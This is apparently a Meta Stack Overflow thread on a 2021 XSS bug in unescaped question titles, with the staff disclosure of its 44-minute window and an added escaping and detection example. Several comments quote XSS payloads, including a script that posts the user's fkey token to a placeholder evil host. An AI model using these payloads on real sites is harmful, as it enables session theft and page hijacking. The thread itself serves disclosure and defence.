58

This question cannot be rendered: "Simple multi-colored textarea based editor", neither on question view nor on list view.

The bug is triggered by adding <textarea> or some other tag to the title, as in this revision, or this other question.

  • 3
    It's not the pagination, it's that question. It breaks the site. Which is interesting, because the preview looks fine...
    – Ryan M Mod
    Commented Sep 1, 2021 at 10:21
  • 1
    Repro'd on Chrome Commented Sep 1, 2021 at 10:22
  • 1
    and Firefox on Win10 Commented Sep 1, 2021 at 10:24
  • The problem was that the title contained <textarea>; I changed it to textarea which seemed to fix it. Commented Sep 1, 2021 at 10:28
  • 1
    Similar breakage here stackoverflow.com/questions/3558119/… If this is improper HTML escaping it could be pretty serious, no?
    – Jan
    Commented Sep 1, 2021 at 10:36
  • 6
    Looks like a serious XSS vulnerability. Have fun loading a page having <script> document.location.href='';</script> in it.
    – Ivar
    Commented Sep 1, 2021 at 10:37
  • 4
    The search for "html tag" is my favourite: stackoverflow.com/search?q=html+tag Commented Sep 1, 2021 at 10:42
  • 10
    People are fast! Someone already tried to take advantage of that...
    – Tomerikoo
    Commented Sep 1, 2021 at 10:52
  • 10
    So, when will Stack Overflow be force-invalidating all user sessions after a blatant XSS vulnerability on the front page of one of the most highly viewed websites about development on the internet? Or will this get brushed under the rug? Commented Sep 1, 2021 at 11:33
  • 4
    @Qix poor rug, so many things already brushed underneath it. Surely it overflows by now. Commented Sep 1, 2021 at 11:41
  • @Qix It seems likely that they would be able to check if anyone actually exploited it to do that based on the information in the database. Though grace period edits might be a problem if they're not recorded in the database.
    – Ryan M Mod
    Commented Sep 1, 2021 at 11:46
  • 6
    @Ryan A smart hacker or wannabe hacker knowing SO well enough would indeed use the grace period to hide their activity, making it impossible to monitor. Unless SO also keeps a log of all the submitted data as it goes through, which I really doubt. Commented Sep 1, 2021 at 12:01
  • @Tomerikoo What was that question intending to do?
    – Anonymous
    Commented Sep 1, 2021 at 22:05
  • 6
    @Qix-MONICAWASMISTREATED No staff deleted any comments here. Normal comment moderation by the community mods happened, which has never triggered a notification. You can stop the conspiracy mongering.
    – Baum mit Augen Mod
    Commented Sep 2, 2021 at 9:20
  • 1
    @BaummitAugen After the last three years and the deletion of whole conversations during the Monica incident, that trust is entirely lost. It is not a conspiracy, it is fact. Sorry. Commented Sep 3, 2021 at 9:16

2 Answers

74

The vulnerability has been closed (was related to turning off smarty-encoding for titles) and has been fixed (smarty-encoding is once again turned off network-wide).

The vulnerability was on the network for 44 minutes, from 10:02 GMT (the time that smarty-encoding was pushed to prod) until I deactivated it network-wide via site setting at 10:46 GMT.

I can confirm that only two posts were posted/edited during the vulnerability time-window that included <script> tags or other XSS attack vectors, both by the same user, and both were Proof of Concept posts that included <script>alert('hello world');</script> in the title. So there were no actual XSS attacks, no user data was compromised, etc.


Update from Yaakov (2023-12, after no longer with Stack): a more complete account of what happened, along with lessons learned

  • 16
    Will there be a full RCA published? Do you know if any of our user/session credentials have been compromised?
    – Gordon
    Commented Sep 1, 2021 at 10:57
  • 7
    It's surprising how a <script> XSS worked like that on a website like SO. I hope we can get more information on the incident, to know we are safe on the website, as the simple use of a tag is the most basic XSS vector.
    – iunfixit
    Commented Sep 1, 2021 at 11:12
  • 1
    @Gordon depends when they turned off "smarty-encoding for titles", whatever this is. Might be matter of minutes, hours, days, or weeks. Commented Sep 1, 2021 at 11:42
  • 2
    Agreed. Post mortem would be nice. I suppose impact would be trivial to assess by looking at script tags in titles, if any. Commented Sep 1, 2021 at 11:46
  • 9
    I'll post more details here when I can. Updated already. Follow this post if you want to know more. Commented Sep 1, 2021 at 11:48
  • 7
    @Yaakov but what about grace period edits? Can you track those too? Smart hacker could: 1) start with innocent title, 2) set malicious title in grace period, 3) collect data, and still in grace period, put back the original title. Can you track such edits? Commented Sep 1, 2021 at 12:24
  • 3
    There are ways to perform XSS without the use of <script>. For example <img src="" onerror="alert('XSS')">.
    – Ivar
    Commented Sep 1, 2021 at 13:04
  • 3
    @Ivar I searched for posts that took advantage of other XSS attack vectors as well. Updated the post above to note this. Commented Sep 1, 2021 at 13:13
  • 3
    Does it matter which posts were posted or edited during this time period? What about displaying (e.g. in search) any of the existing posts? Or is their content somehow cached? This comment implies that it’s not. Commented Sep 1, 2021 at 13:57
  • 1
    @Anonymous They would only have to see that it might be a vulnerability. And lots of questions don't get deleted.
    – khelwood
    Commented Sep 1, 2021 at 22:22
  • 2
    @Anonymous How could someone tell that a thing might happen? Optimism and imagination?
    – khelwood
    Commented Sep 1, 2021 at 22:31
  • 2
    @khelwood Good point. But I think a question with the title <script>$.post("https://someevilwebsite.invalid", {"fkey": StackExchange.options.user.fkey});</script> would get deleted pretty quickly (due to it obviously not being a real question)...
    – Anonymous
    Commented Sep 1, 2021 at 23:27
  • 7
    @Anonymous But a title like "What does <script...evil...> do in this code?" could surely look like a real question.
    – khelwood
    Commented Sep 1, 2021 at 23:32
  • 6
    @Qix-MONICAWASMISTREATED If you are talking about stackoverflow.com/questions/69012356 , this was posted after the bug was already fixed Commented Sep 2, 2021 at 8:35
  • 3
    Are there any plans to implement CSP in order to prevent XSS attacks in the future? There is already a feature request from 2016 on Meta SE, but there was no official answer given by SE. (I know the CSP header is already present, but the current policy isn't very complete/secure, and that's not just my opinion.) Commented Sep 4, 2021 at 18:02
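A defender's view of the two things Yaakov's answer describes, as an added example that is not Stack Overflow's code: the raw-interpolation rendering that encoding-off produces next to the escaped rendering, and a sweep over stored titles for markup like the one run on posts from the exposure window. The sample titles are constructed (two reuse the proof-of-concept payloads quoted in this thread), and the regexes are an assumed approximation of that sweep, not the actual query.

```javascript
// Added example, not Stack Overflow's code. Sample data below is constructed.

// Characters that carry meaning in HTML text or attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: the title is interpolated raw into the template,
// which is the effect of output encoding being switched off for titles.
function renderTitleUnsafe(title) {
  return `<h1 class="question-title">${title}</h1>`;
}

// Hardened rendering: the title can only ever appear as text.
function renderTitleSafe(title) {
  return `<h1 class="question-title">${escapeHtml(title)}</h1>`;
}

// Post-incident sweep (assumed shape): flag any title containing a tag, and
// mark separately those with script-capable markup (script tags, on* handler
// attributes, javascript: URLs). Coarse by design; a bare "a < b" is not a tag.
const TAG_RE = /<\/?[a-z][^>]*>/i;
const SCRIPT_RE = /<script\b|\bon[a-z]+\s*=|javascript:/i;

function scanTitles(posts) {
  return posts
    .filter((p) => TAG_RE.test(p.title))
    .map((p) => ({ id: p.id, title: p.title, scriptCapable: SCRIPT_RE.test(p.title) }));
}

// Constructed sample titles; ids 2 and 3 reuse payloads quoted on this page.
const SAMPLE_POSTS = [
  { id: 1, title: 'Simple multi-colored <textarea> based editor' },
  { id: 2, title: "<script>alert('hello world');</script>" },
  { id: 3, title: '<img src="" onerror="alert(\'XSS\')">' },
  { id: 4, title: 'How do I parse JSON in Python?' },
  { id: 5, title: 'What does a < b mean in C?' },
];

// Stand-alone run: show which sample titles the sweep would surface.
for (const hit of scanTitles(SAMPLE_POSTS)) {
  console.log(hit.id, hit.scriptCapable ? 'script-capable' : 'tag only', escapeHtml(hit.title));
}
```

The `<textarea>` case is the one that broke rendering in the original report: it carries no script, but an unescaped open tag still swallows the rest of the page's markup, so a sweep has to flag any tag, not only `<script>`.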
19

It appears that it included script tags as well. I was able to snap this screenshot at 2021-09-01T10:41:16Z before it was fixed:

hello world JS alert

source code view

  • Added a screenshot of the source code of the main page when the XSS was still active. Never mind the selection on the picture; the actual script tag is in line 876.
    – Gordon
    Commented Sep 1, 2021 at 11:16
